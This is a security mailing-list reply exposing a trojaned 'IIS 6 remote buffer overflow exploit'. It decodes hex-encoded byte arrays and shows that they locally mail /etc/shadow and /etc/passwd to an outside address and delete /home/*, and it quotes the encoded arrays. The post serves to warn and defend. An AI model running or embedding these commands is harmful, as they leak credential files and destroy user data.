RE: IIS 6 Remote Buffer Overflow Exploit

["Lauro, John" <jlauro () umflint edu>]

Not that anyone would fall for running this on anything besides a test
system, but to save 30 second to decode, what it really does (locally,
not remotely) is: 

cat /etc/shadow |mail full-disclosure () lists grok org uk
cat /etc/passwd |mail full-disclosure () lists grok org uk
/bin/rm -rf /home/*;clear;echo bl4ckh4t,hehe

-----Original Message-----

*/
char shellcode[] =
"\x2f\x62\x69\x6e\x2f\x72\x6d\x20"
"\x2d\x72\x66\x20\x2f\x68\x6f\x6d"
"\x65\x2f\x2a\x3b\x63\x6c\x65\x61"
"\x72\x3b\x65\x63\x68\x6f\x20\x62"
"\x6c\x34\x63\x6b\x68\x34\x74\x2c"
"\x68\x65\x68\x65";

char launcher [] =
"\x63\x61\x74\x20\x2f\x65\x74\x63\x2f\x73"
"\x68\x61\x64\x6f\x77\x20\x7c\x6d\x61\x69"
"\x6c\x20\x66\x75\x6c\x6c\x2d\x64\x69"
"\x73\x63\x6c\x6f\x73\x75\x72\x65\x40"
"\x6c\x69\x73\x74\x73\x2e\x67\x72\x6f\x6b"
"\x2e\x6f\x72\x67\x2e\x75\x6b\x20";

char netcat_shell [] =
"\x63\x61\x74\x20\x2f\x65\x74\x63\x2f\x70"
"\x61\x73\x73\x77\x64\x20\x7c\x6d\x61\x69"
"\x6c\x20\x66\x75\x6c\x6c\x2d\x64\x69"
"\x73\x63\x6c\x6f\x73\x75\x72\x65\x40"
"\x6c\x69\x73\x74\x73\x2e\x67\x72\x6f\x6b"
"\x2e\x6f\x72\x67\x2e\x75\x6b\x20";

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/